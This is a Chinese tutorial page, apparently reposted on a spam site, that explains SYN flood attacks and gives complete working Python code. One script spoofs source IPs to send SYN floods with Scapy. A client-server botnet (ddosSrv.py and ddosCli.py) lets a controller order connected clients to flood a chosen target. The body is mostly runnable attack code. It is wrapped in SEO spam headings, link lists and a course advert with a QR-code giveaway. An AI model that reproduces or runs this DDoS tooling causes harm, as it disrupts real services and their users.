当前位置: 首页 > news >正文

秦皇岛做网站的公司哪家好政务网站建设存在问题

秦皇岛做网站的公司哪家好,政务网站建设存在问题,中信建设 官方网站,建设网站公司专业服务文章目录 SYN 泛洪攻击Scapy3k 基本用法代码实现DDos 实现思路argparse 模块socket 模块代码实现Client 端程序测试后记关于Python技术储备一、Python所有方向的学习路线二、Python基础学习视频三、精品Python学习书籍四、Python工具包项目源码合集①Python工具包②Python实战案… 文章目录 SYN 泛洪攻击Scapy3k 基本用法代码实现DDos 实现思路argparse 模块socket 模块代码实现Client 端程序测试后记关于Python技术储备一、Python所有方向的学习路线二、Python基础学习视频三、精品Python学习书籍四、Python工具包项目源码合集①Python工具包②Python实战案例③Python小游戏源码五、面试资料六、Python兼职渠道 SYN 泛洪攻击 SYN泛洪攻击是一种比较常用的Dos方式之一。通过发送大量伪造的 TCP 连接请求使被攻击主机资源耗尽通常是 CPU 满负荷或内存不足的攻击方式 我们都知道建立 TCP 连接需要三次握手。正常情况下客户端首先向服务器端发送SYN报文随后服务端返回以SYNACK报文最后客户端向服务端发送ACK报文完成三次握手 而SYN泛洪攻击则是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文。由于服务器在处理 TCP 请求时会在协议栈留一块缓冲区来存储握手的过程当然如果超过一定时间内没有接收到客户端的报文本次连接在协议栈中存储的数据将会被丢弃。攻击者如果利用这段时间发送大量的连接请求全部挂起在半连接状态。这样将不断消耗服务器资源直到拒绝服务 Scapy3k 基本用法 Scapy3k其实就是Scapy的 Python3 版本以下简称Scapy。Scapy是一个强大的交互式数据包处理程序。可用来发送、嗅探、解析和伪造网络数据包。在网络攻击和渗透测试重应用非常广泛。Scapy是一个独立的程序同时还可以作为 Python 的第三方库使用 首先安装Scapy3kWindows 不方便下面的操作我都是在 Linux 中进行的 sudo pip install scapy运行scapy sudo scapy因为Scapy发送数据包需要root权限所以这里加上sudo。另外运行的时候会出现一些警告信息因为没有安装相应的依赖包不过暂时用不到所以不用管 接下来我们用Scapy构造一个简单的数据包 pkt IP(dst 192.168.50.10)接下来构造SYN数据包并发送出去 pkt IP(src 125.4.2.1,dst192.168.50.10)/TCP(dport80,flagsS) send(pkt)我们构造了一个 IP 包和 TCP 包并将它们组合到一块这样就有了一个完整的 TCP 数据包否则是无法发送出去的。IP 包中我们指定了源地址src和目的地址dst其中src是我们伪造的地址这也是保护攻击者的一种方式。flags的值设定为S说明我们要发送的是一个SYN数据包。非常简单的一段指令就够早了一个伪造了源 IP 地址的SYN数据包 代码实现 现在我们要用 Python 以第三方库的形式使用Scapy使用方法和用交互式 Shell 的方式一样 前面我们构造了SYN数据包现在需要实现随机伪造源 IP 地址、以及不同的源端口向目标主机发送SYN数据包 import random from scapy.all import \* def synFlood(tgt,dPort):srcList \[201.1.1.2,10.1.1.102,69.1.1.2,125.130.5.199\]for sPort in range(1024,65535):index random.randrange(4)ipLayer IP(srcsrcList\[index\], dsttgt)tcpLayer TCP(sportsPort, dport dPort, flagsS)packet ipLayer / tcpLayer send(packet)DDos 实现思路 前面我们已经实现了SYN泛洪攻击而DDos则是多台主机一起发起攻击我们只需要能发送命令让连接到服务器的客户端一起向同一目标发起攻击就可以了 世界最大的黑客组织Anonymous经常使用LOIC(low Orbit Ion Cannon滴轨道离子炮)进行大规模的DDos。LOIC有个HIVEMIND模式用户可以通过连接到一台 IRC 服务器当有用户发送命令任何以HIVEMIND模式连接到 IRC 服务器的成员都会立即攻击该目标 这种方式的优点事不需要傀儡机可以有很多 “志同道合” 的人一起帮助你实现DDos不过不太适合在傀儡机中使用。当然实现思路有很多根据不同情况的选择也会不同。而这里我们将采用客户端、服务器的方式来实现DDos这种方式非常简单可扩展性也比较强 argparse 模块 由于 Server 端需要发送命令去控制 Client 端发起攻击所以这里我们先规定好命令格式 #-H xxx.xxx.xxx.xxx -p xxxx -c start|stop -H后面是被攻击主机的 IP 地址-p指定被攻击的端口号-c控制攻击的开始与停止 命令制定好了接下来看一下如何使用命令解析库argparse \# Import argparse package import argparse # New ArgumentParser object parser argparse.ArgumentParser(descriptionProcess some integers.) # Add parameter parser.add\_argument(-p, destport, type int, help An port number!) # Parse command line arguments args parser.parse\_args() print(Port:,args.port)上面的代码中我们创建了一个ArgumentParser对象description参数是对命令行解析的一个描述信息通常在我们使用-h命令的时候显示。add_argument添加我们要解析的参数这里我们只添加了一个-p参数dest是通过parse_args()函数返回的对象中的一个属性名称。type就是解析参数的类型。help指定的字符串是为了生成帮助信息。argparse默认就支持-h参数只要我们在添加参数的时候指定help的值就可以生成帮助信息了 socket 模块 Python 中的socket提供了访问 BSDsocket的接口可以非常方便的实现网络中的信息交换。通常我们使用socket的时候需要指定ip地址、端口号、协议类型。在进行socket编程之前我们先了解一下客户端(Client)和服务器(Server)的概念。通俗的讲主动发起连接请求的称为客户端监听端口响应连接的称为服务器。下面我写一个客户端和服务器的例子 客户端 \# Import socket package import socket# Create socket s socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)# Establish connection s.connect((192.168.0.100, 7786))上面这个例子我们首先导入 socket 库然后创建了一个 socket 对象socket 对象中的参数AF_INET表示我们使用的是 IPV4 协议SOCK_STREAM则表示我们使用的是基于流的 TCP 协议。最后我们指定ip地址和端口号建立连接 服务器 \# Import socket package import socketcliList \[\] # Create socket s socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)# Specify IP Port s.bind((0.0.0.0, 7786))# Strat monitor s.listen(10)while True:# Receive a new connectionsock, addr s.accept()# Add sock to the listcliList.append(sock)服务器的写法比客户端稍微复杂一些在创建完 socket 之后要绑定一个地址和端口这里的0.0.0.0表示绑定到所有的网络地址端口号只要是没被占用的就可以。之后开始监听端口并在参数中指定最大连接数为 10。最后循环等待新的连接并将已连接的 socket 对象添加到列表中。更多相关细节可以查看 Python 官方文档 代码实现 Server 端 由于 Server 端能等待 Client 主动连接所以我们在 Server 端发送命令控制 Client 端发起SYN泛洪攻击 在主函数中我们创建 socket绑定所有网络地址和58868端口并开始监听之后我们新开一个线程来等待客户端的连接以免阻塞我们输入命令 def main():s socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)s.bind((0.0.0.0, 58868))s.listen(1024)t Thread(targetwaitConnect,args(s,))t.start()由于我们要给所有客户端发送命令所以我们在新开的线程中将连接进来的 socket 添加到一个 list 中这个稍后介绍但在主函数中我们第一次输入命令之前需要至少有一个客户端链接到服务器所以这里我判断了一下socket的长度 print(Wait at least a client connection!) while not len(socketList):pass print(It has been a client connection!)现在循环等待输入命令输入之后判断命令是否满足命令格式的基本要求如果满足就把命令发送给所有客户端 while True:print( \* 50)print(The command format:#-H xxx.xxx.xxx.xxx -p xxxx -c start)# Wait for input commandcmd\_str input(Please input cmd:)if len(cmd\_str):if cmd\_str\[0\] #:sendCmd(cmd\_str)现在程序的大体框架已经有了接下来编写主函数中没有完成的子功能。首先我们应该实现等待客户端的函数方便开启新的线程 在这个函数中我们只需要循环等待客户端的连接就可以新连接的 socket 要判断一下是否在 socketList 中已经存储过了如果没有就添加到 socketList 中 \# wait connection def waitConnect(s):while True:sock, addr s.accept()if sock not in socketList:socketList.append(socket)我们再来实现发送命令的函数这个函数会遍历 socketList将每个 socket 都调用一次 send 将命令发送出去 \# send command def sendCmd(cmd):print(Send command......)for sock in socketList:sock.send(cmd.encode (UTF-8))至此我们的Server端就完成了。新建一个文件将其命名为ddosSrv.py向其中添加如下代码 import socket import argparse from threading import ThreadsocketList \[\] # Command format #-H xxx.xxx.xxx.xxx -p xxxx -c start|stop # Send command def sendCmd(cmd):print(Send command......)for sock in socketList:sock.send(cmd.encode(UTF-8))# Wait connect def waitConnect(s):while True:sock, addr s.accept()if sock not in socketList:socketList.append(sock)def main():s socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)s.bind((0.0.0.0, 58868))s.listen(1024)t Thread(target waitConnect, args (s, ))t.start()print(Wait at least a client connection!)while not len(socketList):passprint(It has been a client connection!)while True:print( \* 50)print(The command format:#-H xxx.xxx.xxx.xxx -p xxx -c start)# Wait for input commandcmd\_str input(Please input cmd:)if len(cmd\_str):if cmd\_str\[0\] #:sendCmd(cmd\_str)if \_\_name\_\_ \_\_main\_\_:main()Client 端 我们将在 Client 端实现对主机的SYN泛洪攻击并在脚本启动后主动连接 Server 端等待 Server 端发送命令 在主函数中我们先创建ArgumentParser()对象并将需要解析的命令参数添加好 def main():p argparse.ArgumentParser()p.add\_argument(-H, dest host, type str)p.add\_argument(-p, dest port, type int)p.add\_argument(-c, dest cmd, type str)现在可以创建 socket连接服务器了。这里为了测试我们连接到本地的 58868 端口 try:s socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)s.connect((127.0.0.1, 58868))print(To connected server was success!)print( \* 50)cmdHandle(s, p) except:print(The network connected failed!)print(Please restart the script!)sys.exit(0)我们将接受命令和处理命令定义在一个单独的函数中。这里我们使用一个全局变量用于判断是否有进程正在发起SYN泛洪攻击。之后就开始循环接收命令了接收道德数据是byte型我们需要对其进行解码解码之后才是字符串。如果接收到的数据长度为 0就跳过后续的内容重新接收数据 \# Process command def cmdHandle(sock, parser):global curProcesswhile True:# Receive commanddata sock.recv(1024).decode(UTF-8)if len(data) 0:print(The data is empty)continue;如果数据长度不为 0就判断是否具有命令基本格式的特征#满足基本条件就需要用ArgumentParser对象来解析命令 if data\[0\] #:try:# Parse commandoptions parser.parse\_args(data\[1:\].split())m\_host options.hostm\_port options.portm\_cmd options.cmd命令参数解析出来后还需要判断到底是start命令还是stop命令。如果是start命令首先要判断当前是否有进程在运行如果有进程判断进程是否存活。如果当前有进程正在发起SYN泛洪攻击我们就先结束这个进程并清空屏幕然后再启动一个进程发起SYN泛洪攻击 \# DDos start command if m\_cmd.lower() start:if curProcess ! None and curprocess.is\_alive():# End of processcurProcess.terminate()curProcess Noneos.system(clear)print(The synFlood is start)p Process(target synFlood, args (m\_host, m\_port))p.start()curProcess p如果命令是stop并且有进程存活就直接结束这个进程并清空屏幕否则就什么也不做 \# DDos stop commandelif m\_cmd.lower() stop:if curProcess.is\_alive():curProcess.terminate()os.system(clear) except:print(Failed to perform the command!)最后新建一个文件命名为ddosCli.py向其中添加如下代码 \# -\*- coding: utf-8 -\*- import sys import socket import random import argparse from multiprocessing import Process from scapy.all import \* import os isWorking False curProcess None# SYN flood attack def synFlood(tgt,dPort):print(\*100)print(The syn flood is running!)print(\*100)srcList \[201.1.1.2,10.1.1.102,69.1.1.2,125.130.5.199\]for sPort in range(1024,65535):index random.randrange(4)ipLayer IP(srcsrcList\[index\], dsttgt)tcpLayer TCP(sportsPort, dportdPort,flagsS)packet ipLayer / tcpLayer send(packet)# Command format #-H xxx.xxx.xxx.xxx -p xxxx -c start # Process command def cmdHandle(sock,parser):global curProcesswhile True:# Receive commanddata sock.recv(1024).decode(utf-8)if len(data) 0:print(The data is empty)returnif data\[0\] #:try:# Parse commandoptions parser.parse\_args(data\[1:\].split())m\_host options.hostm\_port options.portm\_cmd options.cmd# DDos start commandif m\_cmd.lower() start:if curProcess ! None and curProcess.is\_alive():curProcess.terminate()curProcess Noneos.system(clear)print(The synFlood is start)p Process(targetsynFlood,args(m\_host,m\_port))p.start()curProcess p# DDos stop commandelif m\_cmd.lower() stop:if curProcess.is\_alive():curProcess.terminate()os.system(clear)except:print(Failed to perform the command!)def main():# Add commands that need to be parsedp argparse.ArgumentParser()p.add\_argument(-H, desthost, typestr)p.add\_argument(-p, destport, typeint)p.add\_argument(-c, destcmd, typestr)print(\* \* 40)try:# Create socket objects socket.socket(socket.AF\_INET,socket.SOCK\_STREAM)# Connect to Servers.connect((127.0.0.1,58868))print(To connected server was success!)print( \* 40)# Process commandcmdHandle(s,p)except:print(The network connected failed!)print(Please restart the script!)sys.exit(0)if \_\_name\_\_ \_\_main\_\_:main()程序测试 首先运行Server端脚本 sudo python3 ddosSrv.py然后再运行Client端脚本一定要用root权限运行 此时可以看到Client端已经提示连接成功了 Server端也提示有一个客户端连接了 输入一个命令测试一下这里我以我自己的博客为目标进行测试各位请遵守网络安全法 看到Client端已经开始发送数据包了说明已经发起了SYN泛洪攻击 后记 scapy库是基于 python2 的如果是 python3应该使用kamene详情可以参考 kamene 官方文档和 scapy 官方文档 关于Python技术储备 学好 Python 不论是就业还是做副业赚钱都不错但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料给那些想学习 Python 的小伙伴们一点帮助 保存图片微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】 一、Python所有方向的学习路线 Python所有方向的技术点做的整理形成各个领域的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。 二、Python基础学习视频 ② 路线对应学习视频 还有很多适合0基础入门的学习视频有了这些视频轻轻松松上手Python~在这里插入图片描述 ③练习题 每节视频课后都有对应的练习题哦可以检验学习成果哈哈 因篇幅有限仅展示部分资料 三、精品Python学习书籍 当我学到一定基础有自己的理解能力的时候会去阅读一些前辈整理的书籍或者手写的笔记资料这些笔记详细记载了他们对一些技术点的理解这些理解是比较独到可以学到不一样的思路。 四、Python工具包项目源码合集 ①Python工具包 学习Python常用的开发软件都在这里了每个都有详细的安装教程保证你可以安装成功哦 ②Python实战案例 光学理论是没用的要学会跟着一起敲代码动手实操才能将自己的所学运用到实际当中去这时候可以搞点实战案例来学习。100实战案例源码等你来拿 ③Python小游戏源码 如果觉得上面的实战案例有点枯燥可以试试自己用Python编写小游戏让你的学习过程中增添一点趣味 五、面试资料 我们学习Python必然是为了找到高薪的工作下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料并且有阿里大佬给出了权威的解答刷完这一套面试资料相信大家都能找到满意的工作。 六、Python兼职渠道 而且学会Python以后还可以在各大兼职平台接单赚钱各种兼职渠道兼职注意事项如何和客户沟通我都整理成文档了。 这份完整版的Python全套学习资料已经上传CSDN朋友们如果需要可以保存图片微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
http://www.huolong8.cn/news/184662/

相关文章:

  • 设计上海网站建设贵阳网站建设推广
  • 嘉兴型网站系统总部做一个同城app得多少钱
  • 那个啥的网站推荐下分销商城的服务商
  • 手机站和微网站的区别中企动力z邮箱登录手机
  • 辽宁注册公司网站python开发一个wordpress
  • 移动端网站开发尺寸上品设计
  • 垂直网站建设规模可信网站认证申请
  • 旅游网站建设有哪些不足网站推广内容
  • 网站会员注册系统下载手把手教做网站
  • 做网站怎样做才有百度快照wordpress首页文章显示图片
  • cms适合做什么网站广州市白云区建设局网站
  • 柳市最好的网站建设公司做网站教学视频
  • 如何查看一家网站是否有备案网站建设公司有
  • 加快政务网站群建设管理宝塔Linux面板清理建设的网站
  • asp网站开发的实训报告织梦网站版权
  • 云南省建设厅合同网站南通高端网站设计
  • 百度手机网页版seo搜索是什么
  • 企业网站建设公司郑州国家企业信用查询信息系统(全国)
  • 建设局网站管理办法做任务的阅币漫画网站
  • 网站营销定义wordpress用户邮件营销插件
  • 最大招聘网站东平建设局网站
  • 木屋网站建设做网站维护要学些什么·
  • 俄罗斯门户网站深圳下周一居家办公
  • 大连建设局网站如何做好外贸网络营销
  • 淄博网站优化昆明网站建设优化
  • 网站建设所面临的问题上海建设工程咨询网查询
  • 深圳企业网站制作公司查询网站备案 互联网信息
  • 做网站排名推广效果怎么样咸宁网站定制
  • 公司网站上线流程博物馆网站建设说明
  • c 网站购物车怎么做nginx伪静态 wordpress